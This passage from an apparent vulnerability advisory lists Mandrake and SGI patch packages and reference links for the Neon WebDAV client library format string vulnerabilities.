Mandrake Linux 10.0/AMD64
http://www.mandrakesecure.net/en/ftp.php -
Mandrake OpenOffice.org-l10n-fr-1.1.2-3.1.100mdk.i586.rpm
Mandrake Linux 10.0
http://www.mandrakesecure.net/en/ftp.php -
Mandrake OpenOffice.org-l10n-fr-1.1.2-3.1.100mdk.i586.rpm
Mandrake Linux 10.0/AMD64
http://www.mandrakesecure.net/en/ftp.php -
Mandrake OpenOffice.org-l10n-it-1.1.2-3.1.100mdk.i586.rpm
Mandrake Linux 10.0
http://www.mandrakesecure.net/en/ftp.php -
Mandrake OpenOffice.org-l10n-it-1.1.2-3.1.100mdk.i586.rpm
Mandrake Linux 10.0/AMD64
http://www.mandrakesecure.net/en/ftp.php -
Mandrake OpenOffice.org-l10n-ja-1.1.2-3.1.100mdk.i586.rpm
Mandrake Linux 10.0
http://www.mandrakesecure.net/en/ftp.php -
Mandrake OpenOffice.org-l10n-ja-1.1.2-3.1.100mdk.i586.rpm
Mandrake Linux 10.0/AMD64
http://www.mandrakesecure.net/en/ftp.php -
Mandrake OpenOffice.org-l10n-ko-1.1.2-3.1.100mdk.i586.rpm
Mandrake Linux 10.0
http://www.mandrakesecure.net/en/ftp.php -
Mandrake OpenOffice.org-l10n-ko-1.1.2-3.1.100mdk.i586.rpm
Mandrake Linux 10.0/AMD64
http://www.mandrakesecure.net/en/ftp.php -
Mandrake OpenOffice.org-l10n-nl-1.1.2-3.1.100mdk.i586.rpm
Mandrake Linux 10.0
http://www.mandrakesecure.net/en/ftp.php -
Mandrake OpenOffice.org-l10n-nl-1.1.2-3.1.100mdk.i586.rpm
Mandrake Linux 10.0/AMD64
http://www.mandrakesecure.net/en/ftp.php -
Mandrake OpenOffice.org-l10n-pl-1.1.2-3.1.100mdk.i586.rpm
Mandrake Linux 10.0
http://www.mandrakesecure.net/en/ftp.php -
Mandrake OpenOffice.org-l10n-pl-1.1.2-3.1.100mdk.i586.rpm
Mandrake Linux 10.0/AMD64
http://www.mandrakesecure.net/en/ftp.php -
Mandrake OpenOffice.org-l10n-pt-1.1.2-3.1.100mdk.i586.rpm
Mandrake Linux 10.0
http://www.mandrakesecure.net/en/ftp.php -
Mandrake OpenOffice.org-l10n-pt-1.1.2-3.1.100mdk.i586.rpm
Mandrake Linux 10.0/AMD64
http://www.mandrakesecure.net/en/ftp.php -
Mandrake OpenOffice.org-l10n-pt_BR-1.1.2-3.1.100mdk.i586.rpm
Mandrake Linux 10.0
http://www.mandrakesecure.net/en/ftp.php -
Mandrake OpenOffice.org-l10n-pt_BR-1.1.2-3.1.100mdk.i586.rpm
Mandrake Linux 10.0/AMD64
http://www.mandrakesecure.net/en/ftp.php -
Mandrake OpenOffice.org-l10n-ru-1.1.2-3.1.100mdk.i586.rpm
Mandrake Linux 10.0
http://www.mandrakesecure.net/en/ftp.php -
Mandrake OpenOffice.org-l10n-ru-1.1.2-3.1.100mdk.i586.rpm
Mandrake Linux 10.0/AMD64
http://www.mandrakesecure.net/en/ftp.php -
Mandrake OpenOffice.org-l10n-sk-1.1.2-3.1.100mdk.i586.rpm
Mandrake Linux 10.0
http://www.mandrakesecure.net/en/ftp.php -
Mandrake OpenOffice.org-l10n-sk-1.1.2-3.1.100mdk.i586.rpm
Mandrake Linux 10.0/AMD64
http://www.mandrakesecure.net/en/ftp.php -
Mandrake OpenOffice.org-l10n-sv-1.1.2-3.1.100mdk.i586.rpm
Mandrake Linux 10.0
http://www.mandrakesecure.net/en/ftp.php -
Mandrake OpenOffice.org-l10n-sv-1.1.2-3.1.100mdk.i586.rpm
Mandrake Linux 10.0/AMD64
http://www.mandrakesecure.net/en/ftp.php -
Mandrake OpenOffice.org-l10n-tr-1.1.2-3.1.100mdk.i586.rpm
Mandrake Linux 10.0
http://www.mandrakesecure.net/en/ftp.php -
Mandrake OpenOffice.org-l10n-tr-1.1.2-3.1.100mdk.i586.rpm
Mandrake Linux 10.0/AMD64
http://www.mandrakesecure.net/en/ftp.php -
Mandrake OpenOffice.org-l10n-zh_CN-1.1.2-3.1.100mdk.i586.rpm
Mandrake Linux 10.0
http://www.mandrakesecure.net/en/ftp.php -
Mandrake OpenOffice.org-l10n-zh_CN-1.1.2-3.1.100mdk.i586.rpm
Mandrake Linux 10.0/AMD64
http://www.mandrakesecure.net/en/ftp.php -
Mandrake OpenOffice.org-l10n-zh_TW-1.1.2-3.1.100mdk.i586.rpm
Mandrake Linux 10.0
http://www.mandrakesecure.net/en/ftp.php -
Mandrake OpenOffice.org-l10n-zh_TW-1.1.2-3.1.100mdk.i586.rpm
Mandrake Linux 10.0/AMD64
http://www.mandrakesecure.net/en/ftp.php -
Mandrake OpenOffice.org-libs-1.1.2-3.1.100mdk.i586.rpm
Mandrake Linux 10.0
http://www.mandrakesecure.net/en/ftp.php -
Mandrake OpenOffice.org-libs-1.1.2-3.1.100mdk.i586.rpm
Mandrake Linux 10.0/AMD64
http://www.mandrakesecure.net/en/ftp.php
SGI ProPack 2.3
-
SGI patch10067.tar.gz
ftp://patches.sgi.com/support/free/security/patches/ProPack/2.3/patch1 0067.tar.gz
SGI ProPack 2.4
-
SGI patch10067.tar.gz
ftp://patches.sgi.com/support/free/security/patches/ProPack/2.4/patch1 0067.tar.gz
References
Neon WebDAV Client Library Format String Vulnerabilities
References:
References:
- Cadaver Home Page (Cadaver)
- Neon Homepage (Neon)
- Project Home Page (ArX)
- RHSA-2004:157-06 - Updated cadaver package fixes security vulnerability in neon (Red Hat)
- void.at - neon format string bugs (Thomas Wana
)